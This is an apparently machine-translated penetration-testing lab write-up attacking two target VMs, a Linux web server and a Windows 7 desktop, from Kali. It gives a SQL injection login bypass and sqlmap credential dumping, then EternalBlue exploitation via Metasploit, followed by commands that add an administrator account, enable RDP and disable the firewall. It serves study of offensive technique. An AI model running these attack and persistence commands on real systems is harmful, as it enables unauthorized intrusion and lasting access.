------------Restore content start------------

0x00 environment

Two target aircrafts: from the host of a small enterprise

　　1. Server : Linux

　　2. Desktop : win

As shown in the figure:

 

 

 

One attacker: Kali Linux (self installed)

README attachment:

 

 

 

Environment configuration:

According to the README document, first put two target aircraft and one attacker on 192.168.8.0/24, and the network connection mode adopts NAT mode.

0x01 penetration process - Server

At this time, my virtual machine only has one kali and one server target. The following operations are performed in kali.

First, use nmap to scan 192.168.8.0/24 and identify the host operating system.

Execute command:

nmap -O 192.168.8.0/24

 

 

Result analysis: This is a Linux system. It can be preliminarily determined that this is a server server. Therefore, the server ip:192.168.8.2

 

nmap 192.168.8.2 -sV

 

 

Scan the port service and its version of the host, and the above results are obtained.

 

Since I am a chicken player who mainly focuses on the web, I first infiltrate port 80.

1, 80 port:

First, use the browser to browse 192.168.8.2.

 

 

Use passive scanning to open zap or burp, and manually browse all browsable pages.

Found in http://192.168.8.2/reports.php Under, there are suspicious sql injection points.

 

 

Enter in the password form: 'or 1=1#

Successfully logged in. Successfully verified the existence of sql injection vulnerability. In consideration of efficiency, sqlmap is used for vulnerability exploitation.

sqlmap -u http://192.168.8.2/reports.php  --forms

 

 

It is found that there are two injection points (manual mining is supplemented. Not only the password parameter has injection points, but also the login parameter has injection points):

 

 

 

Find the current database and current user:

sqlmap -u http://192.168.8.2/reports.php  --forms --current-db --current-user

 

 

Result: current user: company@localhost

Current database: company

 

Find all tables:

sqlmap -u http://192.168.8.2/reports.php  --forms --tables

company database:

 

 

 

information_schema database:

 

 

 

 

 

One step direct dump

sqlmap -u http://192.168.8.2/reports.php  --forms -D company -T users --columns --dump

Directly query all the columns under the users table in the company database:

 

 

And the values in the table:

 

 

Results obtained:

login=jjones&password=babygirl

login=mjones&password=tigger

Enter the following command:

 

sqlmap -u http://192.168.8.2/reports.php  --forms --os-shell

 

 

 

It is found that sql injection is not allowed to take shell.

Next, zap was used for active scanning, and an additional reflective xss vulnerability was found.

Similarly, xss vulnerability also exists at the sql injection point. As shown in the following figure, submit post parameters:

 

 

 

 

 

No, I can't find it. Port 80 is over.

 

2, 139, 445 ports:

I have checked all the loopholes that can be checked and tried everything that can be tried. My neck is sore. No progress, go to the Desktop.

 

0x02 penetration process - Desktop

First, use nmap to check the ip address of the desktop host, and use the following command:

 

nmap -O 192.168.8.0/24

 

 

 

You can confirm that the ip address of the desktop host is 192.168.8.60

Use the following command to view more detailed information:

nmap 192.168.8.60 -A -oN Desk_nmap_A.txt

Exported Desk_nmap_A.txt as follows:

# Nmap 7.80 scan initiated Thu Dec 17 00:46:37 2020 as: nmap -A -oN Desk_nmap_A.txt 192.168.8.60
Nmap scan report for 192.168.8.60
Host is up (0.00043s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 00:0C:29:10:02:00 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone
Running: Microsoft Windows 2008|8.1|7|Phone|Vista
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
OS details: Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
Service Info: Host: WIN-USPQ65TE72P; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: WIN-USPQ65TE72P, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:10:02:00 (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: WIN-USPQ65TE72P
|   NetBIOS computer name: WIN-USPQ65TE72P\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-16T16:46:51+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-12-16T16:46:51
|_  start_date: 2020-12-16T16:35:05

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 192.168.8.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 17 00:47:30 2020 -- 1 IP address (1 host up) scanned in 53.10 seconds

It is found that port 445 is running Microsoft DS, execute the following command:

nmap --script=smb-vuln-*.nse --script-args=unsafe=1 192.168.8.60

 

 

CVE-2017-0143 vulnerability is most likely to exist.

Open msfconsole and use exploit/windows/smb/ms17_010_eternalblue vulnerability module, after set RHOST, exploit.

You can get the shell. As shown in the figure:

 

 

 

 

 

 

 

The next step is to find a way to raise power

1. add a new user:

 

net user kangel 2314838574 /add

 

2. add a new user to the administrator group

net localgroup administrators kangel /add

3. open 3389 port for remote connection

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

4. turn off the firewall (if it is not turned off, the next remote connection cannot be made)

NetSh Advfirewall set allprofiles state off 

 

 5. Open a new win7 virtual machine for remote connection.

 

Success!!!

 

------------End of recovery------------